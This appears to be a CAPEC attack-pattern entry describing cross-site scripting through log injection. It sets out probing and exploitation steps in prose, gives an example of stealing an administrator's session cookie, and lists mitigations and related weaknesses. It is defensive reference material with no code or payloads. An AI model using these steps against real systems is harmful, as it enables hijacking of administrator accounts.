Cross Site Scripting through Log Files
Attack Pattern ID: 106 (Standard Attack Pattern Completeness: Complete)Typical Severity: HighStatus: Draft
+ Description

Summary

An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attacker's scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.

Attack Execution Flow

Explore
  1. Probe for log injection vulnerability:

    The attacker probes all user-controllable data inputs to the system to probe for log injection vulnerabilities. This may be difficult (unless the attacker has a white box view of the system) because there may not be a feedback event to indicate to the attacker that certain information is being logged.

    Outcomes

    IDtypeOutcome Description
    1Success
    User injected input shows up in the logs

    Security Controls

    IDtypeSecurity Control Description
    1Preventative
    Apply appropriate input validation and filtering of user-controllable input before writing to logs
  2. Probe for cross-site scripting vulnerability:

    The attacker probes all user-controllable data inputs to the system to probe for any cross-site scripting vulnerabilities. Cross-site scripting vulnerabilities identified anywhere in the application indicate an increased potential that such vulnerabilities may exist in the log management portions of the application.

    Outcomes

    IDtypeOutcome Description
    1Success
    Attacker-injected script is executed in user's browser.

    Security Controls

    IDtypeSecurity Control Description
    1Preventative
    HTML encode all log contents before displaying in log management interfaces.
Experiment
  1. Confirm exploitability:

    Create a simple script and inject it into one of the potentially vulnerable fields. This script should take some action which will give an attacker an indication that the attack vector exists.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    The idea is to receive some sort of a feedback event that confirms that an attack is succeeding. That is done with a simple script prior to crafting possibly a more complex script to launch an actual attack.

    env-Web

    Outcomes

    IDtypeOutcome Description
    1Success
    Expected script execution feedback event is observed.
Exploit
  1. SecurityDatabase\Alert\Inject System Logs with Malicious Scripts:

    Create a malicious script to run in the administrator's web based interface and inject it in the system's logs through one of the user controlled fields that are being logged.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    SecurityDatabase\Alert\Inject the vulnerable fields by tampering with their values to contain the malicious scripts. Possibly trigger another event that makes it more likely that injected logs are viewed in the vulnerable UI as soon as possible.

    env-Web
+ Attack Prerequisites

The system uses a web based interface

The system does not cleanse / validate user supplied data before writing it to logs

Information from logs is displayed in a web based interface

The web based log interface does not HTML output encode the log data prior to displaying it in the administrator console.

+ Typical Likelihood of Exploit

Likelihood: Medium

+ Methods of Attack
  • Injection
+ Examples-Instances

Description

An attacker determines that a particular system uses a web based interface for administration. The attacker creates a new user record and supplies a malicious script in the user name field. The script will steal the administrator's authentication cookie and forward it to a site controlled by the attacker. The user name field is not validated by the system and is logged as is in the log. At some point later, an administrator reviews the log activity in the administrative console. When the administrator comes across the attacker's activity record, the malicious script is executed in the context of the attacker's browser, stealing the administrator's authentication cookie and forwarding it to the attacker. An attacker then uses the received authentication cookie to log in to the system as an administrator, assuming that the administrator console can be accessed remotely.

+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

Requires to ability to write a simple scipt and try to inject it through various user controlled fields in the system.

+ Resources Required

No specialized hardware is required

+ Probing Techniques

Locate system screens for operations that are likely to be logged and use these as starting points for injection

+ Solutions and Mitigations

Cleanse all user supplied data before placing it in the logs. Reject all bad data. Ensure that the data is in the expected form.

Use proper HTML output encoding techniques to strip the log data of potentially dangerous scripting characters before displaying it in the administrative console

If possible, disable script execution in the administrative interface.

+ Attack Motivation-Consequences
  • Information Leakage
  • Privilege Escalation
  • Run Arbitrary Code
  • Data Modification
+ Related Weaknesses
CWE-IDWeakness NameWeakness Relationship Type
79Failure to Preserve Web Page Structure ('Cross-site Scripting')Targeted
117Improper Output Sanitization for LogsTargeted
74Failure to Sanitize Data into a Different Plane ('Injection')Secondary
20Improper Input ValidationSecondary
+ Related Attack Patterns
NatureTypeIDNameDescriptionView(s) this relationship pertains toView\(s\)
ChildOfAttack PatternAttack Pattern18Embedding Scripts in Nonscript Elements 
Mechanism of Attack (primary)1000
ChildOfAttack PatternAttack Pattern63Simple Script Injection

Script injection attack pattern is one of the components of the current attack pattern

Mechanism of Attack1000
ChildOfAttack PatternAttack Pattern93Log Injection-Tampering-Forging

Log injection attack pattern is one of the components of the current attack pattern

Mechanism of Attack1000
+ Relevant Security Requirements

HTML output encode all data prior to writing to an HTML page

Properly validate and cleanse/reject user supplied data before writing it to log files

+ Related Security Principles
  • Reluctance to Trust

  • Defense in Depth

+ Purposes
  • Exploitation
+ CIA Impact
Confidentiality Impact: HighIntegrity Impact: HighAvailability Impact: Medium
+ Technical Context
Architectural Paradigms
Client-Server
n-Tier
SOA
Frameworks
All
Platforms
All
Languages
All
+ Content History
Submissions
SubmitterOrganizationDateComments
Evgeny LebanidzeCigital, Inc2009-01-12Initial core pattern content
Modifications
ModifierOrganizationDateComments
Sean BarnumCigital Federal, Inc.2009-04-20Refinement of pattern content